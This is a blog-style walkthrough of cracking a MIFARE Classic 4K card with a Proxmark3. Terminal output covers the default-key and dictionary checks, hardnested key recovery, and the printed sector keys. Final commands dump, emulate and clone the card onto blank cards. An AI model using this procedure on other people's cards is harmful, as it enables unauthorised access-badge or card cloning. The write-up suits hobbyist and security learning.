I got myself a proxmark3 device lately, for fun.
I will not spend time explaining how to flash the device or install proxspace and pm3 as it all explained here.
Lets start with identifying the card we have in hands.
[usb] pm3 --> hf search
[|] Searching for ISO14443-A tag…
[+] UID: 94 13 70 EE
[+] ATQA: 00 02
[+] SAK: 18 [2]
[+] Possible types:
[+] MIFARE Classic 4K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Prng detection……. hard
[?] Hint: try hf mf commands
[+] Valid ISO 14443-A tag foundWhat we got here is a mifare classic 4k.
Lets see if we can find keys to decrypt this card with a simple (but fast) chk command.
[usb] pm3 --> hf mf chk --4k
[+] loaded 61 keys from hardcoded default array
[=] Start check for keys...
[=] .................................................................................
[=] time in checkkeys 12 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | ------------ | 0 | ------------ | 0
[+] 032 | 143 | ------------ | 0 | ------------ | 0
[+] 033 | 159 | ------------ | 0 | ------------ | 0
[+] 034 | 175 | ------------ | 0 | ------------ | 0
[+] 035 | 191 | ------------ | 0 | ------------ | 0
[+] 036 | 207 | ------------ | 0 | ------------ | 0
[+] 037 | 223 | ------------ | 0 | ------------ | 0
[+] 038 | 239 | ------------ | 0 | ------------ | 0
[+] 039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more detailsWe got some keys missing … lets try with a dictionary attack.
[usb] pm3 --> hf mf chk --4k -f mfc_default_keys
[+] loaded 61 keys from hardcoded default array
[+] Loaded 1887 keys from dictionary file `C:\_apps\ProxSpace\pm3\proxmark3\client\dictionaries/mfc_default_keys.dic`
[=] Start check for keys...
[=] ...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
[=] time in checkkeys 249 seconds
[=] testing to read key B...
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 016 | 067 | A0A1A2A3A4A5 | 1 | B0B1B2B3B4B5 | 1
[+] 017 | 071 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 018 | 075 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 019 | 079 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 020 | 083 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 021 | 087 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 022 | 091 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 023 | 095 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 024 | 099 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 025 | 103 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 026 | 107 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 027 | 111 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 028 | 115 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 029 | 119 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 030 | 123 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1
[+] 031 | 127 | ------------ | 0 | ------------ | 0
[+] 032 | 143 | ------------ | 0 | ------------ | 0
[+] 033 | 159 | ------------ | 0 | ------------ | 0
[+] 034 | 175 | ------------ | 0 | ------------ | 0
[+] 035 | 191 | ------------ | 0 | ------------ | 0
[+] 036 | 207 | ------------ | 0 | ------------ | 0
[+] 037 | 223 | ------------ | 0 | ------------ | 0
[+] 038 | 239 | ------------ | 0 | ------------ | 0
[+] 039 | 255 | ------------ | 0 | ------------ | 0
[+] -----+-----+--------------+---+--------------+----
[+] ( 0:Failed / 1:Success )
[?] MAD key detected. Try `hf mf mad` for more detailsStill no luck…
Lets be more aggressive with a autopwn attack which will basically use all possible attacks (sparing us the hassle to to try them one by one or in some cases going block per block).
Note that I am skipping the -f mfc_default_keys.dic here since the previous dictionary attack did not prove useful.
[usb] pm3 --> hf mf autopwn --4k
[!] no known key was supplied, key recovery might fail
[+] loaded 5 user keys
[+] loaded 61 keys from hardcoded default array
[=] running strategy 1
[=] ...
[=] running strategy 2
[=] ....
[+] target sector 0 key type A -- found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] target sector 0 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector 1 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 1 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 2 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 3 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 4 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 5 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 6 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 7 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 8 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 9 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 10 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 11 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 12 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 13 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 14 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 15 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 16 key type A -- found valid key [ A0A1A2A3A4A5 ]
[+] target sector 16 key type B -- found valid key [ B0B1B2B3B4B5 ]
[+] target sector 17 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 17 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 18 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 18 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 19 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 19 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 20 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 20 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 21 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 21 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 22 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 22 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 23 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 23 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 24 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 24 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 25 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 25 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 26 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 26 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 27 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 27 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 28 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 28 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 29 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 29 key type B -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 30 key type A -- found valid key [ FFFFFFFFFFFF ]
[+] target sector 30 key type B -- found valid key [ FFFFFFFFFFFF ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |
[=] 0 | 0 | Brute force benchmark: 509 million (2^28.9) keys/s | 140737488355328 | 3d
[=] 5 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 5226 ms | 140737488355328 | 3d
[=] 5 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 3d
[=] 10 | 112 | Apply bit flip properties | 35058302976 | 69s
[=] 11 | 224 | Apply bit flip properties | 24066930688 | 47s
[=] 12 | 334 | Apply bit flip properties | 17448558592 | 34s
[=] 13 | 444 | Apply bit flip properties | 9945160704 | 20s
[=] 14 | 555 | Apply bit flip properties | 9036183552 | 18s
[=] 15 | 667 | Apply bit flip properties | 7640147968 | 15s
[=] 16 | 779 | Apply bit flip properties | 6678748160 | 13s
[=] 17 | 890 | Apply bit flip properties | 6678748160 | 13s
[=] 18 | 1000 | Apply bit flip properties | 6347502592 | 12s
[=] 18 | 1112 | Apply bit flip properties | 6347502592 | 12s
[=] 18 | 1223 | Apply bit flip properties | 6347502592 | 12s
[=] 19 | 1332 | Apply bit flip properties | 6347502592 | 12s
[=] 20 | 1442 | Apply bit flip properties | 6347502592 | 12s
[=] 23 | 1552 | Apply Sum property. Sum(a0) = 128 | 262742304 | 1s
[=] 24 | 1664 | Apply bit flip properties | 262742304 | 1s
[=] 25 | 1771 | Apply bit flip properties | 262742304 | 1s
[=] 26 | 1879 | Apply bit flip properties | 262742304 | 1s
[=] 26 | 1879 | (Ignoring Sum(a8) properties) | 262742304 | 1s
[=] 27 | 1879 | Brute force phase completed. Key found: E704822D6AED | 0 | 0s
[+] target sector 31 key type A -- found valid key [ E704822D6AED ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |
[=] 0 | 0 | Brute force benchmark: 493 million (2^28.9) keys/s | 140737488355328 | 3d
[=] 3 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 2696 ms | 140737488355328 | 3d
[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 3d
[=] 7 | 112 | Apply bit flip properties | 646552223744 | 22min
[=] 8 | 224 | Apply bit flip properties | 495434760192 | 17min
[=] 9 | 336 | Apply bit flip properties | 474214105088 | 16min
[=] 10 | 448 | Apply bit flip properties | 422348587008 | 14min
[=] 11 | 560 | Apply bit flip properties | 422348587008 | 14min
[=] 12 | 671 | Apply bit flip properties | 422348587008 | 14min
[=] 13 | 783 | Apply bit flip properties | 422348587008 | 14min
[=] 14 | 893 | Apply bit flip properties | 422348587008 | 14min
[=] 15 | 1005 | Apply bit flip properties | 369272356864 | 12min
[=] 15 | 1117 | Apply bit flip properties | 369272356864 | 12min
[=] 16 | 1227 | Apply bit flip properties | 369272356864 | 12min
[=] 17 | 1338 | Apply bit flip properties | 369272356864 | 12min
[=] 17 | 1447 | Apply bit flip properties | 369272356864 | 12min
[=] 18 | 1559 | Apply bit flip properties | 369272356864 | 12min
[=] 19 | 1669 | Apply bit flip properties | 369272356864 | 12min
[=] 20 | 1776 | Apply bit flip properties | 369272356864 | 12min
[=] 21 | 1887 | Apply bit flip properties | 369272356864 | 12min
[=] 23 | 1997 | Apply Sum property. Sum(a0) = 128 | 54618914816 | 2min
[=] 24 | 2106 | Apply bit flip properties | 54618914816 | 2min
[=] 25 | 2215 | Apply bit flip properties | 54618914816 | 2min
[=] 25 | 2324 | Apply bit flip properties | 54618914816 | 2min
[=] 26 | 2324 | (Ignoring Sum(a8) properties) | 54618914816 | 2min
[=] 89 | 2324 | Brute force phase completed. Key found: EAE581E19550 | 0 | 0s
[+] target sector 31 key type B -- found valid key [ EAE581E19550 ]
[=] Hardnested attack starting...
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------+---------+---------------------------------------------------------+-----------------+-------
[=] 0 | 0 | Start using 4 threads and AVX SIMD core | |
[=] 0 | 0 | Brute force benchmark: 411 million (2^28.6) keys/s | 140737488355328 | 4d
[=] 3 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 2965 ms | 140737488355328 | 4d
[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 4d
[=] 7 | 112 | Apply bit flip properties | 1300592066560 | 53min
[=] 8 | 224 | Apply bit flip properties | 956737191936 | 39min
[=] 9 | 336 | Apply bit flip properties | 788323893248 | 32min
[=] 10 | 448 | Apply bit flip properties | 699458519040 | 28min
[=] 11 | 559 | Apply bit flip properties | 611835576320 | 25min
[=] 12 | 669 | Apply bit flip properties | 604953968640 | 25min
[=] 13 | 781 | Apply bit flip properties | 546183413760 | 22min
[=] 14 | 891 | Apply bit flip properties | 497112612864 | 20min
[=] 15 | 1002 | Apply bit flip properties | 497112612864 | 20min
[=] 16 | 1110 | Apply bit flip properties | 497112612864 | 20min
[=] 18 | 1221 | Apply Sum property. Sum(a0) = 160 | 30699894784 | 75s
[=] 18 | 1331 | Apply bit flip properties | 29279275008 | 71s
[=] 19 | 1439 | Apply bit flip properties | 29279275008 | 71s
[=] 20 | 1547 | Apply bit flip properties | 29279275008 | 71s
[=] 21 | 1658 | Apply bit flip properties | 28913727488 | 70s
[=] 21 | 1658 | (1. guess: Sum(a8) = 0) | 28913727488 | 70s
[=] 22 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 28548368384 | 69s
[=] 22 | 1658 | (2. guess: Sum(a8) = 32) | 96629514240 | 4min
[=] 23 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 96404660224 | 4min
[=] 23 | 1658 | (3. guess: Sum(a8) = 64) | 201095266304 | 8min
[=] 25 | 1658 | Apply Sum(a8) and all bytes bitflip properties | 199944667136 | 8min
[=] 25 | 1658 | Brute force phase completed. Key found: A989077ECCED | 0 | 0s
[+] target sector 32 key type A -- found valid key [ A989077ECCED ]
[+] target sector 32 key type B -- found valid key [ A989077ECCED ]
[+] target sector 33 key type A -- found valid key [ A989077ECCED ]
[+] target sector 33 key type B -- found valid key [ A989077ECCED ]
[+] target sector 34 key type A -- found valid key [ A989077ECCED ]
[+] target sector 34 key type B -- found valid key [ A989077ECCED ]
[+] target sector 35 key type A -- found valid key [ A989077ECCED ]
[+] target sector 35 key type B -- found valid key [ A989077ECCED ]
[+] target sector 36 key type A -- found valid key [ A989077ECCED ]
[+] target sector 36 key type B -- found valid key [ A989077ECCED ]
[+] target sector 37 key type A -- found valid key [ A989077ECCED ]
[+] target sector 37 key type B -- found valid key [ A989077ECCED ]
[+] target sector 38 key type A -- found valid key [ A989077ECCED ]
[+] target sector 38 key type B -- found valid key [ A989077ECCED ]
[+] target sector 39 key type A -- found valid key [ A989077ECCED ]
[+] target sector 39 key type B -- found valid key [ A989077ECCED ]
[+] found keys:
[+] -----+-----+--------------+---+--------------+----
[+] Sec | Blk | key A |res| key B |res
[+] -----+-----+--------------+---+--------------+----
[+] 000 | 003 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+] 001 | 007 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 002 | 011 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 016 | 067 | A0A1A2A3A4A5 | D | B0B1B2B3B4B5 | D
[+] 017 | 071 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 018 | 075 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 019 | 079 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 020 | 083 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 021 | 087 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 022 | 091 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 023 | 095 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 024 | 099 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 025 | 103 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 026 | 107 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 027 | 111 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 028 | 115 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 029 | 119 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 030 | 123 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
[+] 031 | 127 | E704822D6AED | H | EAE581E19550 | H
[+] 032 | 143 | A989077ECCED | H | A989077ECCED | R
[+] 033 | 159 | A989077ECCED | R | A989077ECCED | R
[+] 034 | 175 | A989077ECCED | R | A989077ECCED | R
[+] 035 | 191 | A989077ECCED | R | A989077ECCED | R
[+] 036 | 207 | A989077ECCED | R | A989077ECCED | R
[+] 037 | 223 | A989077ECCED | R | A989077ECCED | R
[+] 038 | 239 | A989077ECCED | R | A989077ECCED | R
[+] 039 | 255 | A989077ECCED | R | A989077ECCED | R
[+] -----+-----+--------------+---+--------------+----
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA )
[?] MAD key detected. Try `hf mf mad` for more details
[+] Generating binary key file
[+] Found keys have been dumped to `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-key.bin`
[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0
[=] transferring keys to simulator memory ( ok )
[=] dumping card content to emulator memory (Cmd Error: 04 can occur)
[=] downloading card content from emulator memory
[+] Saved 4096 bytes to binary file `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-dump.bin`
[+] Saved to json file `C:\_apps\ProxSpace\pm3/hf-mf-941370EE-dump.json`
[=] autopwn execution time: 166 secondsOk, this time we got lucky and all keys were found within 166 seconds (on my slow computer…).
Note that the keys have been conveniently dumped to hf-mf-941370EE-key.bin.
The content of the card itself has been dumped to hf-mf-941370EE-dump.bin.
At this stage you can dump the card (again) at any point with this command:
hf mf dump --4k --keys hf-mf-941370EE-key.binYou can also simulate the card with this command :
hf mf sim -u 941370EE --4kAnd last but not least you can restore the dump to a blank card (effectively cloning the original card) with this command :
#for a gen1 card
hf mf cload --4k -f hf-mf-941370EE-dump.bin
#for a gen2 card - notice that you need the keyfile of the target card to be able to write your dump
#note that we are passing the original uid sparing us the extra command hf mf csetuid -u 941370EE
hf mf restore --4k --uid 941370EE -k hf-mf-target-key.bin -f hf-mf-941370EE-dump.binExtra notes, you can test the reading with a block or sector with a key the following way :
hf mf rdbl --blk 127 -b -k EAE581E19550
hf mf rdsc --sec 31 -a -k E704822D6AED